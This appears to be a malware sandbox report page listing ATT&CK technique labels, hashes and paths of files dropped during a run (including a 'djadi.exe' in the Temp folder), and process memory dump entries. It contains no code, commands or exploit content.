T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
00d5d569084f38687879aad3fce3aeda

SHA1
b9d1ea2bc93f1e2fe1bd45fdaa42b597be16a83a

SHA256
f8a26d50f944b0d981f9d2e984a90f62b180342aeb9c2f13e7558e1831dc915f

SHA512
23f94f5ee5ff01a24acdda4c1cd3f37844c84d2334cc64d0e522582a8c2d7122e90a066703ab0787b3424b39134e374e129eb6e4d17ea37f9f0664c501004c66

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
c58c4a7b0c83d268266f5b621cb0ed68

SHA1
8bd3d4155ebbd395e27fd4e7956b19059d1d8b6c

SHA256
2e046c2fec67ef37c2d233e26bf95fc969a9ec186da6591fe82932cc326fa247

SHA512
4736f4b62c19d82cd08a611b1b89b3a34f0bf6cf4a6591d29ad82191c24585f5e26c30a4f2fd5c2882257464a3c1e28fb8f315126181c61d7924e7286ff284f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
0ab60d2bc3a86ad9adb98e7e11537cf8

SHA1
163247fcbec0825f1ecd7b7de2e8c51cba5509d4

SHA256
377c34b0c12d2b53fc2ffec0f84a318ba46ab30d3969cd5f5cc53b3264c174ae

SHA512
ab33f75afc0608bcbb046ac4b54d63938720994417a1954339832dd8a8f06342c3f0d84347251df5b6816e86518e4f1d6647c2493f87fa0c5ee1907bb28aedf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
b9f41ed816b6599859c3ee7dfe0415bb

SHA1
bd5c6875021d8a547a70c152f480c6431057e710

SHA256
e8b8650b21f2349d6c7582ee1ac8d73c69d88560f29a9cbbb19a3433a54f3710

SHA512
ef7ba73fc4729644dcd95ccce527d94ee441513c3b8c0d52b599ecf0b2b19c1407e90d09e6b8c510cdcc7482cad2dd6d06a179ffbec687a17c3f3c75706a338b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ISB2KAC\UHLTY9WW.htm
MD5
54972de2ff36c3663ba412d3b7e4bd76

SHA1
c31c41c3abcac04f8fa0516de113dd5ead0286f0

SHA256
499072e66cc41595f7f55a6f22e4fbfceb88fbc6e85170235830c0282571e2c2

SHA512
2c17e515ace12898603f780d47ca7b5cf45cb00f9d1dfa5559b2ca556a972baab633c293f355887c675d8123928696b98eccba1e7c1dc577720d4bbfc14dc96b

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
88acae3e364010e82fb022c29ab69c9d

SHA1
043f08caaf36d317c60977dd9bdaa2be62ed54a0

SHA256
f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

SHA512
38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
88acae3e364010e82fb022c29ab69c9d

SHA1
043f08caaf36d317c60977dd9bdaa2be62ed54a0

SHA256
f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b

SHA512
38283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c

Download Submit
C:\Users\Admin\AppData\Local\Temp\djadi.exe
MD5
a1500c1f43a4a81444440aa922391300

SHA1
5e3643cf4b29c16dbc9632cddb20689a971533ab

SHA256
0098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0

SHA512
b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\djadi.exe
MD5
a1500c1f43a4a81444440aa922391300

SHA1
5e3643cf4b29c16dbc9632cddb20689a971533ab

SHA256
0098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0

SHA512
b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8RYSA0O1.txt
MD5
c05ba2ad2933696b40e4117c73847f4d

SHA1
4232a809e231bf85c2f54efaa514d3911c7c7729

SHA256
40824b1a5ed8bada683b8f94529a4a7427a4a6cdc145034d894591fb8a6cd175

SHA512
f5e1c072f5cb56a288c8581143f02a49ba8b17c405570f9e25067156376b3fdd0a76489bc598bc4f76ca39485dee58690c0a2552a661d1be10d0fd1bf35c227b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
927abe9d1beb55345697f165f1e16f38

SHA1
7327640308bc3f0e13a5d71036f89b9f7f0e6a27

SHA256
7f8fdbb56eae609b29c9151df4f7eeec6597185d020cb7886ae40b90045e9f0c

SHA512
690e52550232aadb2a33b72c84f46611dd0b53003a9c38c6a2b903087957cdf38f16e7ac26f12d26c3a8f023c3e6bfaade9d8dbe22fa228188b6ef7ace6bd9af

Download Submit
\Users\Admin\AppData\Local\Temp\djadi.exe
MD5
a1500c1f43a4a81444440aa922391300

SHA1
5e3643cf4b29c16dbc9632cddb20689a971533ab

SHA256
0098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0

SHA512
b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd

Download Submit
\Users\Admin\AppData\Local\Temp\djadi.exe
MD5
a1500c1f43a4a81444440aa922391300

SHA1
5e3643cf4b29c16dbc9632cddb20689a971533ab

SHA256
0098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0

SHA512
b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd

Download Submit
memory/748-6-0x0000000000900000-0x0000000000901000-memory.dmp

Filesize
4KB

Download
memory/748-29-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/748-7-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/748-5-0x0000000072F10000-0x00000000735FE000-memory.dmp

Filesize
6.9MB

Download
memory/748-37-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/748-24-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/748-30-0x0000000006100000-0x0000000006101000-memory.dmp

Filesize
4KB

Download
memory/748-2-0x0000000000000000-mapping.dmp

Download
memory/780-59-0x0000000000000000-mapping.dmp

Download
memory/780-62-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/844-1-0x0000000000000000-mapping.dmp

Download
memory/1164-3-0x0000000000000000-mapping.dmp

Download
memory/1248-0-0x000007FEF7800000-0x000007FEF7A7A000-memory.dmp

Filesize
2.5MB

Download
memory/1252-8-0x0000000000000000-mapping.dmp

Download
memory/1252-20-0x0000000004EA0000-0x0000000004EA1000-memory.dmp

Filesize
4KB

Download
memory/1252-10-0x0000000072F10000-0x00000000735FE000-memory.dmp

Filesize
6.9MB

Download
memory/1252-14-0x00000000011C0000-0x00000000011C1000-memory.dmp

Filesize
4KB

Download
memory/1264-12-0x0000000000000000-mapping.dmp

Download
memory/1352-52-0x0000000000000000-mapping.dmp

Download
memory/1352-61-0x00000000025D0000-0x00000000025D4000-memory.dmp

Filesize
16KB

Download
memory/1352-51-0x0000000000000000-mapping.dmp

Download
memory/1512-55-0x0000000002770000-0x0000000002774000-memory.dmp

Filesize
16KB

Download
memory/1512-49-0x0000000000000000-mapping.dmp

Download
memory/1512-47-0x0000000000000000-mapping.dmp

Download
memory/1604-45-0x0000000000000000-mapping.dmp

Download
memory/1820-54-0x0000000000000000-mapping.dmp

Download
memory/1836-48-0x0000000000000000-mapping.dmp

Download